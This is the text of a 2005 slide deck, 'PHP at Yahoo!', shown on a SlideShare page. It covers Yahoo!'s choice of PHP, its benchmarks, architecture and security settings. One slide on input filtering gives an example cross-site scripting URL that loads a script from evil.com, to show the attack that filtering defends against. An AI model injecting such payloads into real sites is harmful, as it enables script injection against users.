SlideShare ist ein Scribd-Unternehmen logo
1 von 26
Downloaden Sie, um offline zu lesen
PHP at Yahoo!
    http://public.yahoo.com/~radwin/



          Michael J. Radwin
            October 20, 2005

1
Outline

    • Yahoo!, as seen by an engineer
    • Choosing PHP in 2002
    • PHP architecture at Yahoo!




2
The Internet’s most trafficked site




3
25 countries, 13 languages




4
Yahoo! by the Numbers

    • 411M unique visitors per month
    • 191M active registered users
    • 11.4M fee-paying customers
    • 3.4B average daily pageviews




    October 2005

5
6
Engineering Values

    1.       Security & Privacy
         –      We must protect our customers’ information
    2.       High Availability
         –      If the site is offline, we’re missing the opportunity
                to serve our customers
    3.       Performance
         –      We serve billions of pageviews a day
    4.       Flexibility & Innovation
         –      Customize site for each market
         –      Rapid development of new features

7
From Proprietary to Open Source

               94 95 96 97 98 99 00 01 02 03 04 05



     Web
    Server                   Apache
             “Filo Server”

       DB
              Flat Files

     Web
     Lang
              yScript


8
Choosing a Language
How and Why We Selected PHP




                              9
Choosing PHP: brief history

     • October 2001: 3 proprietary languages
       – Costly to continue to maintain each
       – Limited features (no subroutines!)
     • Committee began researching
       – Compare features, performance
       – Build vs. Buy vs. Open Source
     • PHP selected May 2002
10
Ideal Language Criteria

     1. High performance         8. Interpreted or
     2. Robust, sand-boxed          dynamically compiled

     3. Language features        9. i18n support
       •   Loops, conditionals   10. Clean separation of
                                     presentation/content/
       •   Complex data-types
                                     app semantics
     4. C/C++ extensions
                                 11. Low training costs
     5. Runs on FreeBSD
                                 12. Doesn’t require CS
                                     degree to use


11
Top 10 Language Choices



                                 yScript




                           mod_include




            XSLT

12
Performance: Requests

                                     Requests/sec

               350
               300
               250                                          PHP
               200                                          YSP
                                                            mod_perl
       req/s




               150                                          HF2k
                                                            yScript
               100                                          Network max
               50
                0
                     25   50   75 100 150 200 300 400 500
                               Concurrent requests


13
Performance: Memory

                                           Active Virtual Memory

                       1000000

                       800000
       kbytes active




                       600000                                              PHP
                                                                           YSP
                                                                           mod_perl
                       400000                                              HF2k
                                                                           yScript
                       200000

                            0
                                 25   50    75   100 150 200 300 400 500
                                             Concurrent requests


14
Why we picked PHP

     1.       Designed for web scripting
     2.       High performance
     3.       Large, Open Source community
          •     Documentation, easy to hire developers
     4.       “Code-in-HTML” paradigm
                <html>
                <?php echo "Hello World"; ?>
                </html>

     5.       Integration, libraries, extensibility
     6.       Tools: IDE, debugger, profiler

15
PHP at Yahoo! Today




                      16
Yahoo!’s Development Methodology

     • Server Architecture
     • File Layout
     • Dependency Management
     • Security
     • Performance
     • Globalization

17
Server Architecture

                          Web Server
                          web server
                           web server
          Load Balancer


                              Scripts




                                                    User
                                                   Profile
                          Apache         Web       Server
                                        Services

                                                    Ad
                                                   Server



18
File Layout


               HTML Templates              95% HTML

          /usr/local/share/htdocs/*.php    5% PHP


              Template Helpers             50% HTML

          /usr/local/share/htdocs/*.inc    50% PHP



               Business Logic              0% HTML

          /usr/local/share/pear/*.inc      100% PHP



              C/C++ Core Code              0% HTML

         Data access, Networking, Crypto   0% PHP




19
Dependency Management

               •   Base PHP package depends only on
                   XML parser
                   ./configure --disable-all
               •   Self-Contained Extensions
                   –   mysql, dba, curl, ldap, pcre, gd, iconv
                   –   To enable
                       1. Install
                          /usr/local/lib/php/20020429/
                          mysql.so
                       2. Add “extension = mysql.so” to
                          php.ini
                   –   Avoids unnecessary dependencies
                   –   Smaller Apache memory footprint


20
Security: INI Settings

     • open_basedir
       – Insurance against /etc/passwd exploits
     • allow_url_fopen = Off
       – Use libcurl extension instead
       – Avoid open proxy exploits
     • display_errors = Off
       – However, log_errors = On
     • safe_mode = Off
       – Intended for shared hosting environment


21
Security: Input Filtering

     http://search.yahoo.com/search?p=<script+src=http://evil.com/x.js>

     • Cross Site Scripting (XSS) most common attack
        – Also “SQL Injection”
     • Normal approach
        – strip_tags()
        – mysqli_escape_string()
        – Examine every line code
        – Tedious and error-prone
     • Use input_filter hook
        – Sanitize all user-submitted data
        – GET/POST/Cookie
22
Performance: Opcode Caches

     • Easiest performance boost
       – Cache parsed .php scripts
         in shared memory
       – Optimizations
       – No code modifications!
     • Several products available
       – Zend Performance Suite
       – APC
       – Turck MMCache
23
Performance: PHP Extensions in C++

     • PHP ships with 80
       extensions written in C/C++
     • Yahoo! develops its own
       proprietary extensions
        – Fast execution speed
        – Access to client libraries
     • Longer development cycle
        – Edit, compile, link, debug
        – Manual memory-
          management
24
Globalization: PHP Unicode

                +        +    ICU   =   6

     • Native Unicode support in 2006
     • Collaborative effort
       – Andrei Zmievski (Yahoo!)
       – Andi Gutmans (Zend)
       – Many members of PHP Community

25
26

Weitere ähnliche Inhalte

Was ist angesagt?

Mason 2 - July 2011 - Seattle Perl Users Group
Mason 2 - July 2011 - Seattle Perl Users GroupMason 2 - July 2011 - Seattle Perl Users Group
Mason 2 - July 2011 - Seattle Perl Users Group
jonswar
 
USP presentation of CHOReOS @ FISL Conference
USP presentation of CHOReOS @ FISL ConferenceUSP presentation of CHOReOS @ FISL Conference
USP presentation of CHOReOS @ FISL Conference
choreos
 
Apache2 BootCamp : Using Apache to Serve Static Content
Apache2 BootCamp : Using Apache to Serve Static ContentApache2 BootCamp : Using Apache to Serve Static Content
Apache2 BootCamp : Using Apache to Serve Static Content
Wildan Maulana
 

Was ist angesagt? (11)

Php reports sumit
Php reports sumitPhp reports sumit
Php reports sumit
 
PHP on Windows - What's New
PHP on Windows - What's NewPHP on Windows - What's New
PHP on Windows - What's New
 
Mason 2 - July 2011 - Seattle Perl Users Group
Mason 2 - July 2011 - Seattle Perl Users GroupMason 2 - July 2011 - Seattle Perl Users Group
Mason 2 - July 2011 - Seattle Perl Users Group
 
PHP Batch Jobs on IBM i
PHP Batch Jobs on IBM iPHP Batch Jobs on IBM i
PHP Batch Jobs on IBM i
 
Professional Frontend Engineering
Professional Frontend EngineeringProfessional Frontend Engineering
Professional Frontend Engineering
 
Web Performance First Aid
Web Performance First AidWeb Performance First Aid
Web Performance First Aid
 
Introduction to eXo ECM Suite
Introduction to eXo ECM SuiteIntroduction to eXo ECM Suite
Introduction to eXo ECM Suite
 
Qcon
QconQcon
Qcon
 
Website designing company_in_delhi_phpwebdevelopment
Website designing company_in_delhi_phpwebdevelopmentWebsite designing company_in_delhi_phpwebdevelopment
Website designing company_in_delhi_phpwebdevelopment
 
USP presentation of CHOReOS @ FISL Conference
USP presentation of CHOReOS @ FISL ConferenceUSP presentation of CHOReOS @ FISL Conference
USP presentation of CHOReOS @ FISL Conference
 
Apache2 BootCamp : Using Apache to Serve Static Content
Apache2 BootCamp : Using Apache to Serve Static ContentApache2 BootCamp : Using Apache to Serve Static Content
Apache2 BootCamp : Using Apache to Serve Static Content
 

Andere mochten auch

Andere mochten auch (6)

Shirley
ShirleyShirley
Shirley
 
Treading the PHPath
Treading the PHPathTreading the PHPath
Treading the PHPath
 
Civilmedia07 Free Radio Germany Stefan Tenner
Civilmedia07 Free Radio Germany Stefan TennerCivilmedia07 Free Radio Germany Stefan Tenner
Civilmedia07 Free Radio Germany Stefan Tenner
 
PHP Annotations: They exist! - JetBrains Webinar
 PHP Annotations: They exist! - JetBrains Webinar PHP Annotations: They exist! - JetBrains Webinar
PHP Annotations: They exist! - JetBrains Webinar
 
Enterprise PHP (php|works 2008)
Enterprise PHP (php|works 2008)Enterprise PHP (php|works 2008)
Enterprise PHP (php|works 2008)
 
Teach a Man To Fish (phpconpl edition)
Teach a Man To Fish (phpconpl edition)Teach a Man To Fish (phpconpl edition)
Teach a Man To Fish (phpconpl edition)
 

Ähnlich wie PHP at Yahoo!

01/2009 - Portral development with liferay
01/2009 - Portral development with liferay01/2009 - Portral development with liferay
01/2009 - Portral development with liferay
daveayan
 
Web technologies lesson 1
Web technologies   lesson 1Web technologies   lesson 1
Web technologies lesson 1
nhepner
 

Ähnlich wie PHP at Yahoo! (20)

Phpyahoo
PhpyahooPhpyahoo
Phpyahoo
 
Integrating PHP With System-i using Web Services
Integrating PHP With System-i using Web ServicesIntegrating PHP With System-i using Web Services
Integrating PHP With System-i using Web Services
 
Decoupling Content Management with Create.js and PHPCR
Decoupling Content Management with Create.js and PHPCRDecoupling Content Management with Create.js and PHPCR
Decoupling Content Management with Create.js and PHPCR
 
Introduction to php
Introduction to phpIntroduction to php
Introduction to php
 
Northeast PHP - High Performance PHP
Northeast PHP - High Performance PHPNortheast PHP - High Performance PHP
Northeast PHP - High Performance PHP
 
Scaling with Symfony - PHP UK
Scaling with Symfony - PHP UKScaling with Symfony - PHP UK
Scaling with Symfony - PHP UK
 
Lamp Introduction 20100419
Lamp Introduction 20100419Lamp Introduction 20100419
Lamp Introduction 20100419
 
High Performance Drupal Sites
High Performance Drupal SitesHigh Performance Drupal Sites
High Performance Drupal Sites
 
01/2009 - Portral development with liferay
01/2009 - Portral development with liferay01/2009 - Portral development with liferay
01/2009 - Portral development with liferay
 
Apache Performance Tuning: Scaling Up
Apache Performance Tuning: Scaling UpApache Performance Tuning: Scaling Up
Apache Performance Tuning: Scaling Up
 
Php
PhpPhp
Php
 
Surviving a Plane Crash, a NU.nl case-study
Surviving a Plane Crash, a NU.nl case-studySurviving a Plane Crash, a NU.nl case-study
Surviving a Plane Crash, a NU.nl case-study
 
PHP Web Development Frameworks & Advantages
PHP Web Development Frameworks & AdvantagesPHP Web Development Frameworks & Advantages
PHP Web Development Frameworks & Advantages
 
PHP is the King, nodejs is the Prince and Lua is the fool
PHP is the King, nodejs is the Prince and Lua is the foolPHP is the King, nodejs is the Prince and Lua is the fool
PHP is the King, nodejs is the Prince and Lua is the fool
 
Ipc mysql php
Ipc mysql php Ipc mysql php
Ipc mysql php
 
Web technologies lesson 1
Web technologies   lesson 1Web technologies   lesson 1
Web technologies lesson 1
 
Vaadin - Rich Web Applications in Server-side Java without Plug-ins or JavaSc...
Vaadin - Rich Web Applications in Server-side Java without Plug-ins or JavaSc...Vaadin - Rich Web Applications in Server-side Java without Plug-ins or JavaSc...
Vaadin - Rich Web Applications in Server-side Java without Plug-ins or JavaSc...
 
PHP and the Cloud: The view from the bazaar
PHP and the Cloud: The view from the bazaarPHP and the Cloud: The view from the bazaar
PHP and the Cloud: The view from the bazaar
 
Realtime traffic analyser
Realtime traffic analyserRealtime traffic analyser
Realtime traffic analyser
 
MySQL Shell: the daily tool for devs and admins. By Vittorio Cioe.
MySQL Shell: the daily tool for devs and admins. By Vittorio Cioe.MySQL Shell: the daily tool for devs and admins. By Vittorio Cioe.
MySQL Shell: the daily tool for devs and admins. By Vittorio Cioe.
 

Mehr von elliando dias

Why you should be excited about ClojureScript
Why you should be excited about ClojureScriptWhy you should be excited about ClojureScript
Why you should be excited about ClojureScript
elliando dias
 
Nomenclatura e peças de container
Nomenclatura  e peças de containerNomenclatura  e peças de container
Nomenclatura e peças de container
elliando dias
 
Polyglot and Poly-paradigm Programming for Better Agility
Polyglot and Poly-paradigm Programming for Better AgilityPolyglot and Poly-paradigm Programming for Better Agility
Polyglot and Poly-paradigm Programming for Better Agility
elliando dias
 
Javascript Libraries
Javascript LibrariesJavascript Libraries
Javascript Libraries
elliando dias
 
How to Make an Eight Bit Computer and Save the World!
How to Make an Eight Bit Computer and Save the World!How to Make an Eight Bit Computer and Save the World!
How to Make an Eight Bit Computer and Save the World!
elliando dias
 
A Practical Guide to Connecting Hardware to the Web
A Practical Guide to Connecting Hardware to the WebA Practical Guide to Connecting Hardware to the Web
A Practical Guide to Connecting Hardware to the Web
elliando dias
 
Introdução ao Arduino
Introdução ao ArduinoIntrodução ao Arduino
Introdução ao Arduino
elliando dias
 
Incanter Data Sorcery
Incanter Data SorceryIncanter Data Sorcery
Incanter Data Sorcery
elliando dias
 
Fab.in.a.box - Fab Academy: Machine Design
Fab.in.a.box - Fab Academy: Machine DesignFab.in.a.box - Fab Academy: Machine Design
Fab.in.a.box - Fab Academy: Machine Design
elliando dias
 
Hadoop - Simple. Scalable.
Hadoop - Simple. Scalable.Hadoop - Simple. Scalable.
Hadoop - Simple. Scalable.
elliando dias
 
Hadoop and Hive Development at Facebook
Hadoop and Hive Development at FacebookHadoop and Hive Development at Facebook
Hadoop and Hive Development at Facebook
elliando dias
 
Multi-core Parallelization in Clojure - a Case Study
Multi-core Parallelization in Clojure - a Case StudyMulti-core Parallelization in Clojure - a Case Study
Multi-core Parallelization in Clojure - a Case Study
elliando dias
 

Mehr von elliando dias (20)

Clojurescript slides
Clojurescript slidesClojurescript slides
Clojurescript slides
 
Why you should be excited about ClojureScript
Why you should be excited about ClojureScriptWhy you should be excited about ClojureScript
Why you should be excited about ClojureScript
 
Functional Programming with Immutable Data Structures
Functional Programming with Immutable Data StructuresFunctional Programming with Immutable Data Structures
Functional Programming with Immutable Data Structures
 
Nomenclatura e peças de container
Nomenclatura  e peças de containerNomenclatura  e peças de container
Nomenclatura e peças de container
 
Geometria Projetiva
Geometria ProjetivaGeometria Projetiva
Geometria Projetiva
 
Polyglot and Poly-paradigm Programming for Better Agility
Polyglot and Poly-paradigm Programming for Better AgilityPolyglot and Poly-paradigm Programming for Better Agility
Polyglot and Poly-paradigm Programming for Better Agility
 
Javascript Libraries
Javascript LibrariesJavascript Libraries
Javascript Libraries
 
How to Make an Eight Bit Computer and Save the World!
How to Make an Eight Bit Computer and Save the World!How to Make an Eight Bit Computer and Save the World!
How to Make an Eight Bit Computer and Save the World!
 
Ragel talk
Ragel talkRagel talk
Ragel talk
 
A Practical Guide to Connecting Hardware to the Web
A Practical Guide to Connecting Hardware to the WebA Practical Guide to Connecting Hardware to the Web
A Practical Guide to Connecting Hardware to the Web
 
Introdução ao Arduino
Introdução ao ArduinoIntrodução ao Arduino
Introdução ao Arduino
 
Minicurso arduino
Minicurso arduinoMinicurso arduino
Minicurso arduino
 
Incanter Data Sorcery
Incanter Data SorceryIncanter Data Sorcery
Incanter Data Sorcery
 
Rango
RangoRango
Rango
 
Fab.in.a.box - Fab Academy: Machine Design
Fab.in.a.box - Fab Academy: Machine DesignFab.in.a.box - Fab Academy: Machine Design
Fab.in.a.box - Fab Academy: Machine Design
 
The Digital Revolution: Machines that makes
The Digital Revolution: Machines that makesThe Digital Revolution: Machines that makes
The Digital Revolution: Machines that makes
 
Hadoop + Clojure
Hadoop + ClojureHadoop + Clojure
Hadoop + Clojure
 
Hadoop - Simple. Scalable.
Hadoop - Simple. Scalable.Hadoop - Simple. Scalable.
Hadoop - Simple. Scalable.
 
Hadoop and Hive Development at Facebook
Hadoop and Hive Development at FacebookHadoop and Hive Development at Facebook
Hadoop and Hive Development at Facebook
 
Multi-core Parallelization in Clojure - a Case Study
Multi-core Parallelization in Clojure - a Case StudyMulti-core Parallelization in Clojure - a Case Study
Multi-core Parallelization in Clojure - a Case Study
 

Kürzlich hochgeladen

Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers:  A Deep Dive into Serverless Spatial Data and FMECloud Frontiers:  A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native Applications
WSO2
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers:  A Deep Dive into Serverless Spatial Data and FMECloud Frontiers:  A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 

Kürzlich hochgeladen (20)

Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
Manulife - Insurer Transformation Award 2024
Manulife - Insurer Transformation Award 2024Manulife - Insurer Transformation Award 2024
Manulife - Insurer Transformation Award 2024
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers:  A Deep Dive into Serverless Spatial Data and FMECloud Frontiers:  A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
 
FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024
 
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ..."I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
 
Ransomware_Q4_2023. The report. [EN].pdf
Ransomware_Q4_2023. The report. [EN].pdfRansomware_Q4_2023. The report. [EN].pdf
Ransomware_Q4_2023. The report. [EN].pdf
 
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native Applications
 
DBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor Presentation
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
AXA XL - Insurer Innovation Award Americas 2024
AXA XL - Insurer Innovation Award Americas 2024AXA XL - Insurer Innovation Award Americas 2024
AXA XL - Insurer Innovation Award Americas 2024
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers:  A Deep Dive into Serverless Spatial Data and FMECloud Frontiers:  A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWEREMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
 
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
 

PHP at Yahoo!

  • 1. PHP at Yahoo! http://public.yahoo.com/~radwin/ Michael J. Radwin October 20, 2005 1
  • 2. Outline • Yahoo!, as seen by an engineer • Choosing PHP in 2002 • PHP architecture at Yahoo! 2
  • 3. The Internet’s most trafficked site 3
  • 4. 25 countries, 13 languages 4
  • 5. Yahoo! by the Numbers • 411M unique visitors per month • 191M active registered users • 11.4M fee-paying customers • 3.4B average daily pageviews October 2005 5
  • 6. 6
  • 7. Engineering Values 1. Security & Privacy – We must protect our customers’ information 2. High Availability – If the site is offline, we’re missing the opportunity to serve our customers 3. Performance – We serve billions of pageviews a day 4. Flexibility & Innovation – Customize site for each market – Rapid development of new features 7
  • 8. From Proprietary to Open Source 94 95 96 97 98 99 00 01 02 03 04 05 Web Server Apache “Filo Server” DB Flat Files Web Lang yScript 8
  • 9. Choosing a Language How and Why We Selected PHP 9
  • 10. Choosing PHP: brief history • October 2001: 3 proprietary languages – Costly to continue to maintain each – Limited features (no subroutines!) • Committee began researching – Compare features, performance – Build vs. Buy vs. Open Source • PHP selected May 2002 10
  • 11. Ideal Language Criteria 1. High performance 8. Interpreted or 2. Robust, sand-boxed dynamically compiled 3. Language features 9. i18n support • Loops, conditionals 10. Clean separation of presentation/content/ • Complex data-types app semantics 4. C/C++ extensions 11. Low training costs 5. Runs on FreeBSD 12. Doesn’t require CS degree to use 11
  • 12. Top 10 Language Choices yScript mod_include XSLT 12
  • 13. Performance: Requests Requests/sec 350 300 250 PHP 200 YSP mod_perl req/s 150 HF2k yScript 100 Network max 50 0 25 50 75 100 150 200 300 400 500 Concurrent requests 13
  • 14. Performance: Memory Active Virtual Memory 1000000 800000 kbytes active 600000 PHP YSP mod_perl 400000 HF2k yScript 200000 0 25 50 75 100 150 200 300 400 500 Concurrent requests 14
  • 15. Why we picked PHP 1. Designed for web scripting 2. High performance 3. Large, Open Source community • Documentation, easy to hire developers 4. “Code-in-HTML” paradigm <html> <?php echo "Hello World"; ?> </html> 5. Integration, libraries, extensibility 6. Tools: IDE, debugger, profiler 15
  • 16. PHP at Yahoo! Today 16
  • 17. Yahoo!’s Development Methodology • Server Architecture • File Layout • Dependency Management • Security • Performance • Globalization 17
  • 18. Server Architecture Web Server web server web server Load Balancer Scripts User Profile Apache Web Server Services Ad Server 18
  • 19. File Layout HTML Templates 95% HTML /usr/local/share/htdocs/*.php 5% PHP Template Helpers 50% HTML /usr/local/share/htdocs/*.inc 50% PHP Business Logic 0% HTML /usr/local/share/pear/*.inc 100% PHP C/C++ Core Code 0% HTML Data access, Networking, Crypto 0% PHP 19
  • 20. Dependency Management • Base PHP package depends only on XML parser ./configure --disable-all • Self-Contained Extensions – mysql, dba, curl, ldap, pcre, gd, iconv – To enable 1. Install /usr/local/lib/php/20020429/ mysql.so 2. Add “extension = mysql.so” to php.ini – Avoids unnecessary dependencies – Smaller Apache memory footprint 20
  • 21. Security: INI Settings • open_basedir – Insurance against /etc/passwd exploits • allow_url_fopen = Off – Use libcurl extension instead – Avoid open proxy exploits • display_errors = Off – However, log_errors = On • safe_mode = Off – Intended for shared hosting environment 21
  • 22. Security: Input Filtering http://search.yahoo.com/search?p=<script+src=http://evil.com/x.js> • Cross Site Scripting (XSS) most common attack – Also “SQL Injection” • Normal approach – strip_tags() – mysqli_escape_string() – Examine every line code – Tedious and error-prone • Use input_filter hook – Sanitize all user-submitted data – GET/POST/Cookie 22
  • 23. Performance: Opcode Caches • Easiest performance boost – Cache parsed .php scripts in shared memory – Optimizations – No code modifications! • Several products available – Zend Performance Suite – APC – Turck MMCache 23
  • 24. Performance: PHP Extensions in C++ • PHP ships with 80 extensions written in C/C++ • Yahoo! develops its own proprietary extensions – Fast execution speed – Access to client libraries • Longer development cycle – Edit, compile, link, debug – Manual memory- management 24
  • 25. Globalization: PHP Unicode + + ICU = 6 • Native Unicode support in 2006 • Collaborative effort – Andrei Zmievski (Yahoo!) – Andi Gutmans (Zend) – Many members of PHP Community 25
  • 26. 26